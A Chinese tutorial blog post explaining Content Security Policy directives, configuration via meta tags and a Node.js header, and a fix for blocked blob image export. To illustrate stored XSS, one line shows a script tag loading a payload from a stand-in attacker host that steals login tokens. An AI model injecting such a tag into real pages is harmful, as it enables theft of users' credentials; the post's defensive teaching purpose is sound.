CSP 内容安全策略入门

最新推荐文章于 2024-08-20 10:54:38 发布
最新推荐文章于 2024-08-20 10:54:38 发布
阅读量617 收藏 1
点赞数 1
文章标签: 前端 javascript ViewUI
原文链接:https://juejin.im/post/5cfb27ef6fb9a07eaa226e44
版权

导语

最近在修复公司系统一个图片导出的功能,无法导出图片

,拒绝加载图片 blob:http://xxxx,违反 Content Security Policy, 于是就 google 一把,这个是什么玩意?

Content Security Policy

这是网站安全方面的内容了,对于网站跨域的问题错误不少见,跨域是由于同源策略导致的,只允许加载来自自身的origin 域的数据,即 a.com 是不能加载来自 b.com 的数据的,这样就解决大部分的安全问题,恶意代码就无法在浏览器端执行获取用户的安全隐私。毕竟,“道高一丈,魔高一尺”,恶意方总有方法绕过同源策略的限制,如XSS跨站脚本攻击,比如网站有个留言板功能,但后台未对用户输入进行过滤,攻击者可以在留言编辑框中输入

<script src="http://www.hacker.org/xss.payload.js"></script>
复制代码

,xss.payload.js可以获取老浏览用户的信息,如的登录token、用户的个人资料等。以前的防御手段主要是对用户输入进行过滤如:去除html标签,实体化,关键字过滤等等,这样一来,最终的结果就是后台的大多数代码都是在做字符串验证,非常的让人不舒服。所以W3 org引入了CSP,它从另外一层面给浏览器提供了保护。

看看 MDN Content Security Policy的解释:

内容安全策略 (CSP) 是一个额外的安全层,用于检测并削弱某些特定类型的攻击,包括跨站脚本 (XSS) 和数据注入攻击等。无论是数据盗取、网站内容污染还是散发恶意软件,这些攻击都是主要的手段。

原理

CSP 通过告诉浏览器一系列的规则,严格规定页面中哪些资源允许有哪些资源,不在指定范围内的统统拒绝,这样一来,从源头上杜绝了不可信的xss payload。

规则

无论是在 <meta> 标签还是在 header 中指定,其值的格式是统一的,都由一系列的指令组成的。

Content-Security-Policy: <policy-directive>; <policy-directive>
复制代码

这里的指令是CSP 规定中用以详细描述某种资源的判断,比如前面的错误图片中,img-src 指定图片,下面列出一些常用的指令

  • child-src:为web workers和其他内嵌浏览器内容(例如用和加载到页面的内容)定义合法的源地址。
  • connect-src:限制能通过脚本接口加载的UR
  • default-src:为其他取指令提供备用服务fetch directives。
  • font-src:设置允许通过@font-face加载的字体源地址。
  • img-src: 限制图片和图标的源地址
  • frame-src: 设置允许通过类似和标签加载的内嵌内容的源地址
  • 限制application manifest文件的源地址。
  • object-src:限制、、标签的源地址。
  • media-src:限制通过、或标签加载的媒体文件的源地址。
  • prefetch-src :指定预加载或预渲染的允许源地址。
  • script-src:限制JavaScript的源地址。
  • style-src:限制层叠样式表文件源。
  • worker-src:限制Worker、SharedWorker或者ServiceWorker脚本源。

更多指令,见 MDN

指令可接受的值

指令后面跟的来源,有两种写法:

  • 预设值
  • URI 通配符
预设值
  • none 不匹配任何东西。
  • self 匹配当前域,但不包括子域。比如 example.com 可以,api.example.com 则会匹配失败。
  • unsafe-inline 允许内嵌的脚本及样式。
  • unsafe-eval 允许通过字符串动态创建的脚本执行,比如 eval,setTimeout 等
URI

除了上面配置的预设值,还可以通过提供完整的URI或带通配符 * 的地址来匹配,以指定资源的合法来源,跟配置跨域的相应头一致,参考Same-origin_policy

实现途径

默认情况下,如果站点未指定 CSP 规则,浏览器不会默认开启,只受同源策略的影响。

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>CSP 安全策略</title>
    <style>
      h1 {
        color: cornflowerblue;
      }
    </style>
  </head>
  <body>
    <h1>Hello CSP !</h1>
    <script>
      window.onload = () => alert("Hi, Jecyu");
    </script>
  </body>
</html>

复制代码

HTML 中添加 标签来指定 Content-Security-Policy 规则
 <head>
    ...
     <meta http-equiv="Content-security-Policy" content="default-src 'self'" />
   ...
  </head>
   
复制代码

效果:

配置站点默认只信息同域的资源,但注意,这个设置并不包含内联的情况,所以结果会如上图。如何修复它呢。如果我们想要允许页面内的内联脚本或样式,则可以通过添加unsafe-inline 指令值来修复。

<meta  http-equiv="Content-security-Policy"  content="default-src 'self' 'unsafe-inline'"
    />
复制代码

default-src,如果指定了它的值,则相当于改变了这些未指定的指令的默认值。可以理解为,上面 style-src 如果没指定,本来其默认值是 *,可以加载所有来源的样式,但设置 default-src 后,默认值就成了 default-src 指定的值。

服务器添加 Content-Security-Policy 响应头来指定规则

这里使用 node.js

const http = require("http");
const fs = require("fs");
const PORT = 8088;
const path = require("path");
console.log();
// 创建一个 http 服务
const server = http.createServer((request, response) => {
  response.setHeader("Content-Type", "text/html;charset='utf-8'");
  response.setHeader("Access-Control-Allow-Origin", "*");
  response.setHeader(
    "Content-security-Policy",
    "default-src 'self' 'unsafe-inline'"
  );
  // 读文件
  fs.readFile(path.resolve(__dirname, "./index.html"), function(err, data) {
    if (err) {
      console.log(`index.html loading is failed` + err);
    } else {
      // 返回 HTML 页面
      response.end(data);
    }
  });
});

// 启动服务,监听端口
server.listen(PORT, () => {
  console.log("服务启动成功,正在监听: ", PORT);
});

复制代码

优先级
  • 对于设置了多次响应头的情况,最严格的规则会生效(无论是在 中,还是 header 中)
  • 同一指令多次指定,以第一个为准,后续的会被忽略。

解决图片导出的问题

看看了请求首页的请求响应参数,如下:

通过前面的学习后,得知可以通过HTML或者Header进行对 CSP 规则的设置,从而避开限制。这里并没有设置 img-src,由于设置 default-src 'self' data: *;,因此图片只能加载同域的图片data:前缀的值

解决方案一:添加 img-src 指令

从图片可知直接设置 img-src *没有包括 blob的数据规则, 来自 content-security-policy.com

因此,需要添加声明规则,default-src blob: *img-src blob: *

解决方案二: 转换图片的格式

在动态设置图片src的时候,先把blob 转为 base64 形式,这样就符合了 CSR 的设置规则了,图片就可以添加到 HTML中了。

   var base64data = "";
   xhr.onload = function() {
          img = new Image();
          var reader = new window.FileReader();
          reader.readAsDataURL(this.response);
          reader.onloadend = function() {
            base64data = reader.result;
            img.src = base64data;
          };
          img.addEventListener(
            "load",
            function() {
              deferred.resolve(img);
              URL.revokeObjectURL(_url);
            },
            false
          );
          img.addEventListener("error", function(errorEvent) {
            deferred.resolve({
              error: errorEvent,
              image: img
            });
            URL.revokeObjectURL(_url);
          });
        };
        xhr.onerror = function() {
          var img = new Image();
          deferred.resolve(img);
        };
        xhr.open("GET", url, true);
        xhr.responseType = "blob";
        xhr.send();
      }
复制代码

浏览器兼容性

(全文完)

进一步阅读

CSP-内容安全策略
07-27 627
Content-Security-Policy 限制资源获取 报告资源获取越权 default-src 限制全局 指定资源类型限制(connect-src/img-src/script-src/style-src/media-src...) 常用限制 1.限制inline-script(html行内js)与其他域的script引入 2.限制外部地址跳转,form-action 3.等等 ...
CSP 内容安全策略
阿道夫的博客
01-03 536
Content-Security-Policy和Content-Security-Policy-Report-Only,也可以同时使用,Content-Security-Policy带有策略强制性,而Content-Security-Policy-Report-Only中的策略只产生报告不具有强制性。CSP(Content-Security-Policy)内容安全策略,官方解释:CSP是一个额外的完全层,用于检测并小若某些特定类型的攻击,包括跨站脚本攻击XSS和数据注入攻击等。2. 前端通过标签进行配置。
CSP内容安全策略
最新发布
YhMjQx的博客
08-20 1572
本篇主要讲解CSP内容安全策略
CSP内容安全策略
weixin_45960266的博客
03-02 994
需要注意的是,正确地配置CSP需要开发者对Web应用程序中的资源来源有深入的了解,并进行适当的配置。同时,CSP本身也存在一些局限性,例如无法防止服务器端攻击等问题,因此需要综合使用其他安全技术来保护Web应用程序的安全。CSP还可以指定允许的图片、样式表、字体和其他资源的来源,以及禁止使用内联脚本和样式等不安全的内容内容安全策略CSP,Content Security Policy)是一种通过限制浏览器执行不安全内容来减少跨站点脚本攻击(XSS)等Web攻击的机制。
XSS防御 内容安全策略 CSP工作原理、配置技巧与最佳实践_安全策略 img-src
2401_84297944的博客
04-26 1205
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!CSP策略是设置了许多内容源的字符串,内容源可以对协议、主机host、关键词等等。开发者可以通过下面的手段通知浏览器那些资源是安全的,可加载执行的;💡 CSP 定义了一系列的指令,每个指令控制一个特定的策略。:定义哪些源的样式可以被安全地加载和应用。: 定义了哪些源的脚本可以被安全地执行。:指定了哪些源的字体可以被安全地加载。:指定了,,和元素能够加载资源的源。
网络安全策略CSP攻略
qq_1015350043的博客
10-04 1228
网络安全防范 XSS的全称叫做跨域脚本攻击,是最常见且危害性最大的网页安全漏洞。简单来说,就是攻击者想尽一切办法将可执行的代码插入到网页中。比较常见的是在评论功能中,攻击者可以在评论区...
CSP-J、CSP-S初赛知识点(2020.09.20).rar
09-20
CSP-J和CSP-S是CCF(中国...以上是根据压缩包文件名推测的CSP-J和CSP-S初赛可能涵盖的知识点,实际内容可能会更具体、深入,包括实践题目和解题技巧。对于准备参加此类竞赛的学生来说,理解和掌握这些知识点至关重要。
内容安全策略 (CSP)
allway2的博客
09-05 6825
base64, iVBORw0KGgoAAAANSUhEUgAAAAUA%0A AAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO%0A 9TXL0Y4OHwAAAABJRU5ErkJggg==',因为它违反了以下内容安全策略指令:“default-src.'none 请注意,'img-src' 没有显式设置,所以 'default-src' 用作后备。,因为它违反了以下内容安全策略指令:“default-src 'none'”。
内容安全策略( CSP )
automation13的博客
11-10 309
内容安全策略 (CSP) 是一个额外的安全层,用于检测并削弱某些特定类型的攻击,包括跨站脚本 (XSS)和数据注入攻击等。(摘自MDN) 具体内容请参考MDN:https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP 对于XSS攻击的防止,请参“美团技术团队”公众号,相关文章地址:https://segmentfault.com/a/1190000016551188 对于React和Vue,XSS攻击已经在框架里进行了防范,但是使用 dan...
HTML5安全介绍之内容安全策略CSP)简介
09-28
前言:HTML5出现后,网络安全更加受到广泛的关注。Web对于网络安全有哪些改进?我们如何来面对越来越危险的网络欺诈和攻击?下面的文章谈到了W3C对于这个问题的最新解决方案。未来有机会的话,我会针对XSS、P3P、同源策略、CORS(跨域资源共享)和CSP进行关于HTML5内容
csp内容安全策略了解
TSHENGCHENGTAO的博客
06-14 1094
csp是一种安全策略,其原理是当浏览器请求某一个网站时,告诉该浏览器申明文件可以执行,什么不可以执行。CSP的引入会使得我们的引入扩展程序更加安全,并且可以由开发者指定可以加载扩展程序的类型,避免恶意的脚本在浏览器中执行,造成信息泄露问题。(xss主要的防御手段)主要可以理解成白名单,CSP 大大增强了网页的安全性。攻击者即使发现了漏洞,也没法注入脚本,除非还控制了一台列入了白名单的可信主机。
内容安全策略(Content Security Policy,CSP
AiENG_07的博客
10-16 414
CSP是一组浏览器安全标头的规范,通过这些标头,网站所有者可以告诉浏览器哪些资源可以加载并执行,以及哪些不可以。这有助于防止恶意脚本的注入,因为浏览器将拒绝加载不符合CSP规则的内容内容安全策略(Content Security Policy,CSP)是一个重要的安全机制,用于帮助保护网站免受恶意攻击和跨站脚本(XSS)等安全威胁。总之,CSP是一个有助于提高网站安全性的重要工具,但需要谨慎配置和管理,以确保安全性与功能之间的平衡。
CSP内容安全策略详解
Songxianshengbei的博客
03-31 907
除了Content-Security-Policy字段外,CSP还支持其他一些相关的字段,如Content-Security-Policy-Report-Only用于报告模式,即只记录违反策略的行为而不阻止其执行;这些规则可以是具体的URL、域名、协议等,也可以是特殊的关键字,如'self'表示允许加载来自同一来源的资源。此外,CSP还支持一些其他指令和特性,如default-src用于设置所有未明确指定类型的资源的默认来源规则,nonce和hash用于验证资源的完整性等。
CSP内容安全策略基础版
知识点沉淀包括不限于前端
02-08 1490
白屏问题 小伙伴业务中经常会遇到白屏问题,其中一大原因是资源被CSP策略拦截了,那么什么是CSP呢?遇到了此问题要如何解决呢? 基础原理 什么是CSP内容安全策略 (CSP) 是一个策略,该策略可以定义哪些资源可以被当前的web页面加载。 为什么要配置CSPCSP 的主要目标是减少和报告 XSS (Cross Site Scripting)攻击 。一般同源策略只对网页的HTML文档做了限制,对加载的其他静态资源如javascript、css、图片等资源等还是可以加载。而XSS攻击则刚好
内容安全策略(CSP)详解
weixin_47450807的博客
03-02 8422
在上一篇博客我们主要总结了XSS攻击,本篇博客主要总结内容安全策略CSP的相关内容。 一、定义 内容安全策略(CSP),是一种安全策略,其原理是当浏览器请求某一个网站时,告诉该浏览器申明文件可以执行,什么不可以执行。CSP是专门解决XSS攻击而生的神器。 CSP的引入会使得我们的引入扩展程序更加安全,并且可以由开发者指定可以加载扩展程序的类型,避免恶意的脚本在浏览器中执行,造成信息泄露问题。 二、CSP的意义 CSP是防XSS的利器,可以把其理解为白名单,开发者通过设置CSP内容,来规定浏览器可以加载的资
内容安全策略CSP)详解
qq_34639706的博客
10-08 2185
内容安全策略CSP),其核心思想十分简单:网站通过发送一个 CSP 头部,来告诉浏览器什么是被授权执行的与什么是需要被禁止的。其被誉为专门为解决XSS攻击而生的神器。 1.CSP是什么 CSP指的是内容安全策略,为了缓解很大一部分潜在的跨站脚本问题,浏览器的扩展程序系...
CSP入门指南:理解并发、通信原语与应用
- 实现涉及通信机制(如管道、队列)和同步与调度策略,确保正确地管理并发执行。 6. **CSP的应用** - **分布式系统**中,CSP有助于进程间通信和资源共享,支持构建高度模块化的系统。 - **实时系统**中,CSP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>